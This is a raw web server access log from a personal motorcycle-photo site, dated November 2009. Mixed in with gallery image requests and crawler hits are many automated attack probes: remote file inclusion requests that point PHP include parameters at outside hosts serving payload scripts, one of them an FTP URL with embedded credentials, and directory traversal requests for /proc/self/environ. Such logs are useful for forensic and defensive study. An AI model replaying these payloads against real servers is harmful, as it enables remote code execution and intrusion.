67.202.24.21 - - [20/Nov/2009:11:54:05 -0800] "GET /logs/access_080928.log HTTP/1.1" 200 4891375 "-" "xchsPmxikyxl 1ehdtbvaq giithnxog1bcyu" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:54:14 -0800] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/123.jpg HTTP/1.1" 200 548793 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:54:27 -0800] "GET /blog/wp-content/gallery/crestoc-2008/img_0091.jpg HTTP/1.1" 200 528876 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:54:42 -0800] "GET /blog/wp-content/gallery/2008-winestoc/028.jpg HTTP/1.1" 200 254762 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:54:55 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-069_0.jpg HTTP/1.0" 200 206667 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
139.13.44.13 - - [20/Nov/2009:11:55:06 -0800] "GET /logs/access_090612.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mail.optima-corp.com/data/.../com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:55:07 -0800] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0162.jpg HTTP/1.1" 200 355966 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
124.217.249.79 - - [20/Nov/2009:11:55:13 -0800] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://toysexviet.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.217.249.79 - - [20/Nov/2009:11:55:14 -0800] "GET /logs/access_080819.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://toysexviet.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:55:21 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/041.jpg HTTP/1.1" 200 476402 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:55:34 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-093_0.jpg HTTP/1.1" 200 343363 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
38.103.167.157 - - [20/Nov/2009:11:55:41 -0800] "GET /logs/access_080721.log HTTP/1.1" 200 1245184 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:55:47 -0800] "GET /blog/wp-content/gallery/crestoc-2008/img_0132.jpg HTTP/1.1" 200 286102 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:56:00 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture233-1024.jpg HTTP/1.1" 200 104253 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
67.195.111.181 - - [20/Nov/2009:11:56:06 -0800] "GET /bikes/cb750K6/?S=D HTTP/1.0" 200 1610 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:56:13 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-129_0.jpg HTTP/1.1" 200 474378 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
61.63.10.150 - - [20/Nov/2009:11:56:20 -0800] "GET /logs/access_080918.log%20%20/?mosConfig_absolute_path=http://gcomweb.com/assinante//include/html/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.63.10.150 - - [20/Nov/2009:11:56:20 -0800] "GET /logs/?mosConfig_absolute_path=http://gcomweb.com/assinante//include/html/id1.txt???? HTTP/1.1" 200 126786 "-" "Mozilla/5.0" "www.dmulk.com"
61.63.10.150 - - [20/Nov/2009:11:56:26 -0800] "GET /?mosConfig_absolute_path=http://gcomweb.com/assinante//include/html/id1.txt???? HTTP/1.1" 200 15980 "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:56:26 -0800] "GET /blog/wp-content/gallery/occ-hondas-2008/295b_1.jpg HTTP/1.1" 200 24839 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
139.13.44.13 - - [20/Nov/2009:11:56:27 -0800] "GET /logs/access_090612.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mail.optima-corp.com/data/.../com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:56:39 -0800] "GET /blog/wp-content/gallery/08-29-2009-westoc2/Picture275-1024.jpg HTTP/1.1" 200 50789 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
139.13.44.13 - - [20/Nov/2009:11:56:50 -0800] "GET /logs/access_090612.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mail.optima-corp.com/data/.../com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:56:51 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-209.jpg HTTP/1.1" 200 387025 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
61.63.10.150 - - [20/Nov/2009:11:56:56 -0800] "GET /logs/access_080811.log%20%20/?mosConfig_absolute_path=http://gcomweb.com/assinante//include/html/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:57:04 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture193-1024.jpg HTTP/1.1" 200 138917 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:57:17 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-170_0.jpg HTTP/1.1" 200 275079 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:57:30 -0800] "GET /blog/wp-content/gallery/crestoc-2008/img_0118.jpg HTTP/1.1" 200 395556 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
139.13.44.13 - - [20/Nov/2009:11:57:40 -0800] "GET /logs/access_090727.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mail.optima-corp.com/data/.../com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:57:43 -0800] "GET /blog/wp-content/gallery/techstoc-2008/img_1005.jpg HTTP/1.1" 200 271088 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:57:56 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc2/Picture005-1024.jpg HTTP/1.1" 200 106539 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
139.13.44.13 - - [20/Nov/2009:11:58:00 -0800] "GET /logs/access_090727.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mail.optima-corp.com/data/.../com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:11:58:08 -0800] "GET /logs/access_090527.log/modules/My_eGallery/index.php?basepath=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:11:58:08 -0800] "GET /logs/access_090228.log/modules/My_eGallery/index.php?basepath=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:58:10 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-039_2.jpg HTTP/1.1" 200 439225 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:58:23 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc2/Picture272-1024.jpg HTTP/1.1" 200 91381 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
200.234.200.157 - - [20/Nov/2009:11:58:30 -0800] "GET /logs/access_090514.log/index.php?pg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
200.234.200.157 - - [20/Nov/2009:11:58:30 -0800] "GET /logs/access_090514.log/index.php?pg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.157.4.42 - - [20/Nov/2009:11:58:31 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.5; http://dmulk.com/blog" "dmulk.com"
200.234.200.157 - - [20/Nov/2009:11:58:32 -0800] "GET /index.php?pg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 15902 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
200.234.200.157 - - [20/Nov/2009:11:58:32 -0800] "GET /logs/access_080821.log/index.php?pg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
200.234.200.157 - - [20/Nov/2009:11:58:32 -0800] "GET /logs/access_080821.log/index.php?pg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
200.234.200.157 - - [20/Nov/2009:11:58:34 -0800] "GET /index.php?pg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 15899 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:58:35 -0800] "GET /blog/wp-content/gallery/crestoc-2008/img_0020.jpg HTTP/1.1" 200 361318 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
157.100.230.82 - - [20/Nov/2009:11:58:42 -0800] "GET /logs/access_081230.log//galeria.php?start=0&kategoria=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:11:58:42 -0800] "GET /logs/access_090614.log//galeria.php?start=0&kategoria=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.4.32.137 - - [20/Nov/2009:11:58:52 -0800] "GET /logs/access_090521.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.alandar.net/www2/cid??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
69.4.32.137 - - [20/Nov/2009:11:58:52 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.alandar.net/www2/cid??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
69.4.32.137 - - [20/Nov/2009:11:58:52 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.alandar.net/www2/cid??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:59:02 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture457-1024.jpg HTTP/1.1" 200 66295 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
66.249.68.200 - - [20/Nov/2009:11:59:13 -0800] "GET /blog/wp-content/gallery/2008-winestoc/012.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:59:15 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-033.jpg HTTP/1.1" 200 400718 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
139.13.44.13 - - [20/Nov/2009:11:59:22 -0800] "GET /logs/access_080616.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mail.optima-corp.com/data/.../com_sef/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:59:29 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture375-1024.jpg HTTP/1.1" 200 66951 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:59:41 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-220.jpg HTTP/1.1" 200 361856 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:11:59:54 -0800] "GET /blog/wp-content/gallery/2009-01-10-techstoc/017.jpg HTTP/1.1" 200 387913 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:00:07 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc2/Picture191-1024.jpg HTTP/1.1" 200 64267 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:00:20 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-069.jpg HTTP/1.1" 200 431589 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
69.4.32.137 - - [20/Nov/2009:12:00:23 -0800] "GET /logs/access_080929.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.alandar.net/www2/cid??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
139.13.44.13 - - [20/Nov/2009:12:00:25 -0800] "GET /logs/access_090614.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mail.optima-corp.com/data/.../com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:00:34 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-075_1.jpg HTTP/1.1" 200 430838 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:00:47 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-139_0.jpg HTTP/1.1" 200 344654 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:01:00 -0800] "GET /blog/wp-content/gallery/08-29-2009-westoc2/Picture281-1024.jpg HTTP/1.1" 200 49510 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
93.190.41.97 - - [20/Nov/2009:12:01:09 -0800] "GET /logs/access_080304.log/error.php?dir=ftp://exlixeco:abcd00121@74.86.58.178/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.dmulk.com"
93.190.41.97 - - [20/Nov/2009:12:01:09 -0800] "GET /error.php?dir=ftp://exlixeco:abcd00121@74.86.58.178/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.dmulk.com"
93.190.41.97 - - [20/Nov/2009:12:01:10 -0800] "GET /logs/error.php?dir=ftp://exlixeco:abcd00121@74.86.58.178/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:01:13 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture204-1024.jpg HTTP/1.1" 200 35502 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
94.236.23.242 - - [20/Nov/2009:12:01:20 -0800] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:12:01:20 -0800] "GET /logs/access_080724.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:12:01:20 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:01:26 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture199-1024.jpg HTTP/1.1" 200 57667 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
94.236.23.242 - - [20/Nov/2009:12:01:34 -0800] "GET /logs/access_081007.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:01:39 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc2/Picture220-1024.jpg HTTP/1.1" 200 71766 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:01:51 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc2/Picture321-1024.jpg HTTP/1.1" 200 63449 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
93.190.41.97 - - [20/Nov/2009:12:01:58 -0800] "GET /logs/access_090517.log/error.php?dir=ftp://exlixeco:abcd00121@74.86.58.178/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:02:04 -0800] "GET /blog/wp-content/gallery/crestoc-2008/img_0115.jpg HTTP/1.1" 200 439089 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
131.173.41.6 - - [20/Nov/2009:12:02:08 -0800] "GET /inc/header.php/step_one.php?server_inc=http://harness21.com//bbs/echo/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
131.173.41.6 - - [20/Nov/2009:12:02:08 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://harness21.com//bbs/echo/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
131.173.41.6 - - [20/Nov/2009:12:02:08 -0800] "GET /logs/access_090617.log%20%20//inc/header.php/step_one.php?server_inc=http://harness21.com//bbs/echo/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
131.173.41.6 - - [20/Nov/2009:12:02:09 -0800] "GET /logs/access_080928.log%20%20//inc/header.php/step_one.php?server_inc=http://harness21.com//bbs/echo/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
131.173.41.6 - - [20/Nov/2009:12:02:10 -0800] "GET /logs/access_090617.log%20%20//inc/header.php/step_one.php?server_inc=http://harness21.com//bbs/echo/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
131.173.41.6 - - [20/Nov/2009:12:02:10 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://harness21.com//bbs/echo/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
131.173.41.6 - - [20/Nov/2009:12:02:11 -0800] "GET /inc/header.php/step_one.php?server_inc=http://harness21.com//bbs/echo/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
131.173.41.6 - - [20/Nov/2009:12:02:11 -0800] "GET /logs/access_080928.log%20%20//inc/header.php/step_one.php?server_inc=http://harness21.com//bbs/echo/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:02:17 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-064_1.jpg HTTP/1.1" 200 508766 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
131.173.41.6 - - [20/Nov/2009:12:02:21 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
131.173.41.6 - - [20/Nov/2009:12:02:21 -0800] "GET /logs/access_090617.log%20%20//inc/header.php/step_one.php?server_inc=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
131.173.41.6 - - [20/Nov/2009:12:02:21 -0800] "GET /logs/access_080928.log%20%20//inc/header.php/step_one.php?server_inc=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
131.173.41.6 - - [20/Nov/2009:12:02:22 -0800] "GET /inc/header.php/step_one.php?server_inc=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:02:30 -0800] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/147.jpg HTTP/1.1" 200 170733 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:02:43 -0800] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0150.jpg HTTP/1.1" 200 378254 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
157.100.230.82 - - [20/Nov/2009:12:02:49 -0800] "GET /logs/access_090614.log//galeria.php?start=0&kategoria=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:12:02:49 -0800] "GET /logs/access_081230.log//galeria.php?start=0&kategoria=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
131.173.41.6 - - [20/Nov/2009:12:02:52 -0800] "GET /logs/access_090617.log//inc/header.php/step_one.php?server_inc=http://harness21.com//bbs/echo/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
131.173.41.6 - - [20/Nov/2009:12:02:52 -0800] "GET /logs/access_090626.log//inc/header.php/step_one.php?server_inc=http://harness21.com//bbs/echo/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
131.173.41.6 - - [20/Nov/2009:12:02:56 -0800] "GET /logs/access_090626.log//inc/header.php/step_one.php?server_inc=http://harness21.com//bbs/echo/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
131.173.41.6 - - [20/Nov/2009:12:02:56 -0800] "GET /logs/access_090617.log//inc/header.php/step_one.php?server_inc=http://harness21.com//bbs/echo/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:02:56 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture436-1024.jpg HTTP/1.1" 200 70134 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:03:09 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-267.jpg HTTP/1.1" 200 483760 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:03:22 -0800] "GET /blog/wp-content/gallery/2008-mountain-calstoc/058.jpg HTTP/1.1" 200 255222 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:03:35 -0800] "GET /blog/wp-content/gallery/2008-mountain-calstoc/008.jpg HTTP/1.1" 200 330794 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
208.115.111.245 - - [20/Nov/2009:12:03:47 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
